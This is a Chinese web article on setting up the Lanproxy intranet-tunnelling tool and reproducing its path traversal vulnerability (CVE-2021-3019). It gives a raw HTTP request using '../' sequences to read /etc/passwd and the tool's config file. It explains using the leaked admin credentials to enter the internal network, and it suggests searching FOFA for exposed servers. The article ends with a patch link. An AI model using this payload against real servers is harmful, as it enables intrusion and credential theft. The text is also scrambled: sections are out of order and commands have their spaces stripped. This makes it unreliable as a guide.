欢迎来到智品网!

企业

Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具。



发布时间:2021-02-10 17:08:50   来源:互联网   作者:

我们可以在添加客户端选项中添加一个需要进行映射的内网主机,如下图填写客户端名称和随机生成客户端秘钥后点击提交即可添加一个客户端:

然后我们访问vps的8090端口,使用上面配置中配置的用户名admin和密码657260进行登录即可进入lanproxy的WEB管理面板:

lanproxy配置过程

lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具,支持tcp流量转发,可支持任何tcp上层协议,可用于访问内网网站、本地支付接口调试、ssh访问、远程桌面等等,而且带有Web在线管理面板,添加端口配置十分简单。目前市面上提供类似服务的有花生壳、TeamView、GoToMyCloud等等,但要使用第三方的公网服务器就必须为第三方付费,并且这些服务都有各种各样的限制,此外,由于数据包会流经第三方,因此对数据安全也是一大隐患。

建议禁止将lanproxy管理面板对外部开放。

  • 我一直都在使用lanproxy工具进行内网穿透,但是在前两天lanproxy却爆了一个路径遍历漏洞(CVE-2021-3019)。该漏洞可以读取服务器上的任意文件,甚至可以可直接获取到lanproxy配置文件,从而获取内部网连接的凭据登录lanproxy管理后台面板直接进入内网操纵内网主机。

    #与在proxy-server配置后台创建客户端时填写的秘钥保持一致;client.key=8dfeb0db68c2400a8c0d30395abb65e2ssl.enable=truessl.jksPath=test.jksssl.keyStorePassword=123456?#这里填写实际的proxy-server地址;没有服务器默认即可,自己有服务器的更换为自己的proxy-server(IP)地址#server.host=lp.thingsglobal.orgserver.host=47.xxx.xxx.72?#proxy-serverssl默认端口4993,默认普通端口4900#ssl.enable=true时这里填写ssl端口,ssl.enable=false时这里填写普通端口server.port=4993项目地址:https://github.com/ffay/lanproxy

  • 拉取源码,运行mvnpackage,打包后的资源放在distribution目录中,包括client和server

  • 或直接下载发布包https://file.nioee.com/d/2e81550ebdbd416c933f/

  • 这里我们直接下载发布版。将下载的服务器端程序的发布包proxy-server-0.1.zip解压后放置在公网vps上。然后进入到proxy-server-0.1/conf目录编辑修改服务器端配置文件config.properties,config.properties的配置参考如下:

    配置完后运行lanproxy:

    cdproxy-server-0.1/binchmod+xstartup.shnohup./startup.sh&server.bind=0.0.0.0?#与代理客户端通信端口server.port=4900?#ssl相关配置server.ssl.enable=trueserver.ssl.bind=0.0.0.0server.ssl.port=4993server.ssl.jksPath=test.jksserver.ssl.keyStorePassword=123456server.ssl.keyManagerPassword=123456?#这个配置可以忽略server.ssl.needsClientAuth=false?#WEB在线配置管理相关信息config.server.bind=0.0.0.0config.server.port=8090config.admin.username=admin#WEB在线配置管理面板登录用户名config.admin.password=657260#WEB在线配置管理面板登录密码

    lanproxy的服务端应安装在一个具有公网IP的服务器上。

    • 若公网服务器为Windows系统,则只需运行startup.bat程序。

      客户端下载我们同样使用发布包:https://seafile.cdjxt.net/d/2e81550ebdbd416c933f

      客户端一般安装在一个内网的Linux服务器或内网Windows电脑上。并且需要具备java1.7及以上的环境。

      我们在内网客户端Linux主机上下载lanproxy的客户端程序proxy-java-client-0.1.zip,同样还是进入到proxy-java-client-0.1/conf目录编辑修改客户端配置文件config.properties,config.properties的配置参考如下:

      如果客户端是Windows系统,则直接双击bin目录下的startup.bat即可。

      这里的客户端密钥在之后配置客户端时会用到。

      客户端配置

      配置完成后运行lanproxy客户端:

      参考:

      header="Server:LPS-0.1"

      此时,便可以在服务端控制面板的配置管理中对内网主机进行代理配置了:

      如上图所示,我们将内网主机Debian的22端口映射到了公网vps的2222端口上,也就是说我们访问公网vps的2222端口就相当于访问内网主机Debian的22端口。如下,我们通过公网vps的2222端口来通过ssh连接内网主机:

      sshroot@47.xxx.xxx.72-p2222

      如上图所示,连接成功。

      漏洞复现

      该漏洞可以读取服务器上的任意文件,甚至可以可直接获取到lanproxy配置文件,从而获取登录用户名与密码登录lanproxy管理后台面板直接进入内网操纵内网主机。

      影响版本

      • http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202101-275

        我们访问lanproxy的控制面板,抓包并构造恶意请求,读取目标主机上的任意文件:

        GET/../../../../../../../../../etc/passwdHTTP/1.1Host:47.xxx.xxx.72:8090Cache-Control:max-age=0Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0(WindowsNT10.0;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/87.0.4280.88Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language:zh-CN,zh;q=0.9Connection:close

        如上图所示,读取成功。

        或直接下载发布包https://file.nioee.com/d/2e81550ebdbd416c933f/

      服务端配置

      下面我们读取lanproxy的config配置文件:

      /../conf/config.properties

      如上图所示,读取成功。

      cdproxy-java-client-0.1/binchmod+xstartup.shnohup./startup.sh&

      http://mp.weixin.qq.com/s?__biz=MzUyMTAyODYwNg==?=2247489409&idx=1&sn=43c89f02920d6417c8dea45c437281a5&chksm=f9e00110ce978806b2183fa1f2ff26c1906a3eee4305e7de30e92718c60a802fcda26574b2c4&mpshare=1&scene=23&srcid=0111AQnphEMsg6crfeEOh5iv&sharer_sharetime=1610336571217&sharer_shareid=fb28a23f5efa30b40dcc9905f48f84bf#rd?

      如上图所示,总共可以发现2029条数据。

      Ending......

      我们利用读取到的配置文件中的用户名和密码,可直接在管理后台进行登录,从而访问内网,如下图所示,成功登录:

      修复建议

      • 目前lanproxy厂商已发布升级补丁以修复漏洞,补丁获取链接:https://github.com/ffay/lanproxy/commits/master

      该漏洞构造非常简单,下面我将演示如何搭建lanproxy内网穿透,并进行该漏洞的复现。

      lanproxy下载:

      • 在fofa上用如下fofa语法搜索暴露在公网上的lanproxy:

        https://www.moerats.com/archives/727/

        http://www.kekefund.com/2018/06/24/lanproxy/#2%EF%BC%8CJava%E5%AE%A2%E6%88%B7%E7%AB%AF%E9%85%8D%E7%BD%AE

        lanproxy0.1

      责任编辑:ysman
    0
    免责声明:
    ① 凡本网注明稿件来源:“智品网”的所有文字、图片和音视频稿件,版权均属智品网所有,任何媒体、网站或 个人未经本网协议授权不得转载、链接、转贴或以其他方式复制发表。已经本网协议授权的媒体、网站,在下载使用时必须注明稿 件来源:“智品网”,违者本网将依法追究责任。
    ② 本网未注明稿件来源:“智品网”的文/图等稿件均为转载稿,本网转载出于传递更多信息之目的,并不意味着赞同其观点或 证实其内容的真实性。如其他媒体、网站或个人从本网下载使用,必须保留本网注明的“稿件来源”,并自负版权等法律责任。如擅 自篡改为稿件来源:“智品网”,本网将依法追究责任。如对稿件内容有疑议,请及时与我们联系。 新闻纠错:748492175 邮箱:748492175@qq.com
    ③ 如本网转载稿涉及版权等问题,请作者在两周内速与智品网联系。

    友情链接

    关于我们 联系方式 招聘信息 版权声明 网站地图